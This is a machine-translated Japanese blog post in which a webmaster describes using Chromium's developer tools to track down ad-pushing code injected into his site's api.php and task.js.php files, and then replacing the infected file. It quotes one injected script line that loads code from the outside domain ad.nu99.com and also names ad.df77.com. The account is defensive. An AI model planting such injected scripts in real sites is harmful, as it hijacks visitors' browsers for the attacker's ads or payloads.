Chromiumコアブラウザのパケットキャプチャツールを使用して悪意のあるコードを削除します

Chromiumコアブラウザのパケットキャプチャツールを使用して悪意のあるコードを削除します

昨年の12月頃、友人から、私のウェブサイトを開くと広告がポップアップ表示されることに気付かされました。以前、ウェブサイトを構築した際にホームページファイルに悪意のあるコードが挿入されていた事例があったため、わざとウェブサイトを開いてソースコードを注意深く調べ、疑わしいコードがないか確認しましたが、何も見つかりませんでした。友人に、毎回ポップアップ表示されるかどうか尋ねたところ、毎回ではなく、たまに表示されるだけだと答えました。そこで、通信事業者が作成した DNS ハイジャック広告だと結論付けました。その後間もなく、遠く離れた北京にいるチームメイトの Pengpeng が、ウェブサイトのホームページを開くとゲーム広告が時々表示されるのはなぜかと私に尋ねました。今回は、ウェブサイトが悪意のあるコードに感染しているに違いないと確信しました。ウェブページのソース コードをもう一度注意深く調べたところ、ようやく手がかりが見つかりました。悪意のあるコードは確かに存在しますが、ウェブサイトのホームページ ファイルには存在しません。代わりに、第 2 レベル ドメイン フォーラムのデータ呼び出しに使用される PHP ファイル「api.php」に配置されています。悪意のあるコードの作成者は次のように書いています。

document.write(“<script src='/images/loading.gif' data-original=http://ad.nu99.com/ip.asp?loc=zibo></script>”);

その後、このファイルがメイン サイトに呼び出され、このコードがロードされます。最後にある zibo が、Zibo でポップアップ広告ページが一度も見つからなかった理由です。

5月に北京で起業家会議に出席しました。ホテルの部屋でウェブサイトを閲覧していたところ、別の広告ページがポップアップ表示されました。すぐにソースコードを開いて確認してみましたが、異常は見つかりませんでした。その時は、時間を見つけて問題を注意深く調べなければならないと思いましたが、会議から戻った後、そのことを忘れてしまいました。

先週、友人の家に行き、自分のウェブサイトを見せました。突然、またポップアップ広告を見つけました。今回は、悪意のあるコードがウェブサイトに挿入されていたと確信しました。原因を慎重に調べなければなりません。今週は忙しすぎて、ほとんど忘れていました。今日は、ウェブサイトのアクセス速度が特に遅く、朝には開けないことがよくありました。安全のために、一時的なデータのバックアップを作成しました。データのバックアップが完了した後、コンピュータールームのカスタマーサービスQQにメッセージを残して、ウェブサイトの起動速度が遅いことを伝えましたが、返信がありませんでした。午後になるとウェブサイトの起動が速くなりましたが、それでもまだ遅かったです。ホームページを読み込む必要がありました。ホームページを読み込む数秒間、ブラウザのステータス バーにドメイン名 ad.df77.com が表示されました。このドメイン名は、以前扱った ad.nu99.com とまったく同じで、とても見覚えがありました。今回は、この悪意のあるコードを逃がすわけにはいかないので、見つけなければなりません。

処理中、すべてのスクリプト コード セグメントが 1 つずつチェックされましたが、最終的に結果は見つかりませんでした。最後に、Chromium コア ブラウザのパケット キャプチャ ツールを思いつきました。パケット キャプチャ ツールを開いて、Web ページを更新しました。ページによって読み込まれた各ドメイン名のソース データは、以下のソース パッケージ リストに明確に表示されました。

ソース タブを確認すると、ad.df77.com のドメイン名からダウンロードされた「ip.asp?shandong|zibo」によって、悪意のあるコードの存在が再び証明されます。ネットワーク タブを開くと、リアルタイムでダウンロードされたネットワーク データがすべて表示されます。下まで注意深く確認すると、最後に、task.js.php ファイルに隠された悪意のあるコードの隠しファイルが表示されます。

FTP で task.js.php ファイルを探し、最終更新日時が 2012 年 12 月 24 日であることを確認します。これは、悪意のあるコードが半年前から挿入されていたことを証明しています。ファイルをすぐにローカルにダウンロードし、サンプルを保存し、完全な task.js.php ファイルをアップロードして上書きします。

ここでは、すべてのウェブマスターに以下の情報にも注意を払うようお願いし、予防策を強化してください。

このドメイン名による攻撃に関して、インターネット上では 100 件近くの支援要請があります。

ハッカーはこの IP にバインドされた複数のドメイン名を持っており、それらはすべて悪意のある攻撃に使用されていると推測されています。

手続きを終えた後も、気持ちが落ち着きませんでした。起業する上で、草の根ウェブマスターであることの大変さを改めて実感しました。ウェブマスターとして、コードを書いてトロイの木馬を駆除し、画像を修復してテキストを編集し、プロモーションや販売を行い、ドメイン ネーム サーバーの購入に投資する必要があります。ウェブサイトを赤ん坊のように世話し、ゆっくりと成長させることに全力を注ぐ一方で、あらゆる種類の悪意ある者があなたの労働の成果を盗むのを防ぐ必要もあります。

「職業にはそれぞれ専門分野がある」という古い格言があります。確かに私はハッカーではないので、他人を攻撃する方法は知りません。おそらく、「徳が高ければ、悪も高まる」ということわざの通り、私の個人的な力ではハッカーの攻撃に抵抗することは決してできないでしょう。しかし、私は道を歩いている最中なので、止まることができません。

心の中の小さな夢のためにたゆむことなく前進し続ける小さなウェブマスターとして、現状に満足せず、小さな成果に満足することがよくありますが、ジョー氏が私たちに与えた真摯な教え「貪欲であり続け、愚かであり続けなさい」を決して忘れません。最後に、ムーンライトブログのこの一文を独自の解釈で締めくくりたいと思います。

「私たちは何か新しいものを作ったり、完璧なことをしたりすることはできないかもしれませんが、私たちが好きなこと、つまり愚かでユニークなことをするために、もっと頑固で不器用になることはできます。たとえ世界がまだ洗練されていたとしても、それは私たちがもっと努力することを止めることはできません。」

この記事は、Li Jiechun のブログ http://blog.qlzhan.com/361 に最初に掲載されました。


元のタイトル: Chromium コアブラウザのパケットキャプチャツールを使用して悪意のあるコードを削除する

キーワード: クロム、パケット キャプチャ、悪意のあるコード、ウェブマスター、ウェブサイト、ウェブサイトのプロモーション、収益化

<<:  Baidu Green Wave アルゴリズム 2.0 により SEO 最適化は過去のものになる

>>:  今日のトピック: Baidu と Google のアルゴリズムの最近のアップデートのレビュー

推薦する

Baidu Share なしでウェブサイトを最適化する方法はありますか?

Baidu を使用する際に、Baidu スナップショット後の Baidu 共有データに注目したことが...

バラと棘:インターネットマーケティングは美しく見える

最近、Mu Niu Liu Ma は Hao Young を再開しました。今日は、クライアントの C...

WeChatとWeiboのマーケティングアカウントに対する姿勢:一方はユーザーを、もう一方は利益を欲しがる

【IT Times 週刊深層観察】先日、WeChatチームはWeChat上のマーケティングアカウント...

小紅書ブランドマーケティングの発展を1つの記事で理解する

私たちがよく知っている「リトル・レッド・ブック」が変化しつつあることに気づいているかどうかはわかりま...

ウェブサイトのユーザーを育成し、維持する方法について簡単に説明します。

長い間何も書いていませんでした。怠惰は誰にでも共通する問題であり、もちろん私も例外ではありません。最...

「検索エンジン評価ガイド」の読書体験

1. 検索用語の3つのカテゴリ検索エンジンは、検索語句を「知る」、「行う」、「行く」の 3 つのカテ...

flarevm-2.99 ユーロ/Xen/512M メモリ/25GSSD/100M 無制限

2009年に設立されたと主張しているが、資格は本物ではないVPSプロバイダーであるflarevm(イ...

クラウドコンピューティングのコストを管理する4つの方法

[[421467]] COVID-19 パンデミックとそのロックダウン措置により、クラウド コンピュ...

モンスターメグス - 3.5 USD/10g SSD/無制限のウェブサイト構築/無料ドメイン名/フェニックス/20g DDOS 保護

monstermegs.com は 2010 年に設立されたホスティング会社です。主に仮想ホストを運...

なぜ www なしの Baidu スナップショットの方がランクが高いのでしょうか?

最近、Baidu ランキングの Web ページ スナップショットのほとんどに www がないことが判...

業務スキルを向上させる3つの方法のうちの1つ目は読書です

だんだんと緑も薄れてきて、秋の雰囲気が強くなってきました。今日は家でのんびり過ごしています。窓の外は...

Lu Cong: SEO はリソースの共有を学ばなければならない - Bugmenot

[冒頭に書きました] 正直に言うと、この方法は、有能な IT 業界の人材が必ず使うべきものです。もち...

hostkvm のオーストラリア VPS の簡単なレビュー。3 つのネットワークに China Unicom AS9929 の使用を強制

Hostkvm は今年、オーストラリアのシドニー データ センターで VPS 事業を開始しました。今...

小さくて美しいマーケティングアプローチは、独自の特徴を出すことです

最近、「小さくて美しい」という言葉をよく耳にします。小さくて美しいとは、いったいどういう意味でしょう...